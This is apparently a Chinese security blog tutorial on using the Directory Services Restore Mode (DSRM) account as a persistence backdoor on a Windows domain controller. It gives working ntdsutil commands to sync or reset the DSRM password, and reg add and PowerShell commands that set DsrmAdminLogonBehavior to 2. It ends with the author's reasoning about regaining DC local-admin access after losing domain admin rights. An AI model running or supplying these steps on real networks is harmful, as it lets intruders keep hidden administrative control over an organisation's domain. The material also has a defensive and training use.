权限维持——DSRM后门

dsrm账户

dsrm账户是用来启动目录服务恢复模式时进行系统修复和恢复用的，这个账户是在dc创建时就被创建了，并且在安装过程中密码被设置，这个账户与域账户数据库无关，所以就算域数据库出了问题，dsrm也能给他恢复了。

修改dsrm密码

win2008以上，可以直接将dsrm密码同步问以存在域用户密码

NTDSUTIL    #打开ntdsutil
set DSRM password      #修改DSRM密码
sync from domain account <你想同步的域用户>
q     #退出DSRM修改密码模式
q     #退出ntdsutil


直接修改DSRM密码
NTDSUTIL  
set DSRM password
reset password on server null     #在当前域控制器上恢复DSRM密码

修改DSRM的登方式

首先我们要知道DSRM有3种登录方式

0：默认值，只有在域控制器重启并进入DSRM模式时，才能使用DSRM账户。
1：只有当本地AD、DS服务停止时，才可以使用DSRM管理员账户登录域控制器。
2：在任何情况下，都可以使用DSRM登录。

ps：在windows对DSRM登录进行了限制，我们需要将该值该为2。

用cmd修改注册表，将该值改为2
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v dsrmadminlogonbehavior /t REG_DWORD /d 2 /f

reg add：用于添加新的注册表项或修改现有项。
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA"：指定注册表路径。
/v dsrmadminlogonbehavior：指定要设置的注册表值名称。
/t REG_DWORD：指定值的数据类型，这里是 DWORD（32 位数字）。
/d 2：设置值为 2。
/f：强制执行命令而不提示确认。

验证是否修改成功
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v dsrmadminlogonbehavior
看返回值


用powershell修改注册表
New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD


New-ItemProperty：这是一个 PowerShell 命令，用于在指定的注册表路径中创建新的项属性或更新现有属性。
"hklm:\system\currentcontrolset\control\lsa\"：这是注册表路径，表示 HKEY_LOCAL_MACHINE 下的系统控制设置，其中包含与本地安全策略和 LSA（本地安全机构）相关的设置。
-name "dsrmadminlogonbehavior"：指定要创建或更新的注册表项的名称。
-value 2：设置该项的值。对于 dsrmadminlogonbehavior，值 2 通常表示允许 DSRM 管理员使用域管理员帐户登录。
-propertyType DWORD：指定属性的类型，这里是 DWORD（32 位数字）。

验证
Get-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" | Select-Object dsrmadminlogonbehavior

制作后门的疑惑

先说一下我在网络上看到的文章，我看到的文章都是在这里，修改注册表后，DSRM可以随时登录，也抓到了DSRM账户的哈希，但是接下来都是用的pth哈希传递攻击。和朋友（一个大帅哥）一起讨论了一下，也问了问师父，我们疑惑的点是，这个后门的作用是我们已经失去域管权限了，不能再debug提权了，再用pth就不行了。师父的一句话点醒我了，为什么我直接修改了DSRM的密码，而不是去同步用户的呢？在上面我吗已经修改了DSRM的登录方式：任意情况下都可以登录，这样我们可以通过这个来登录域控的本地管理员。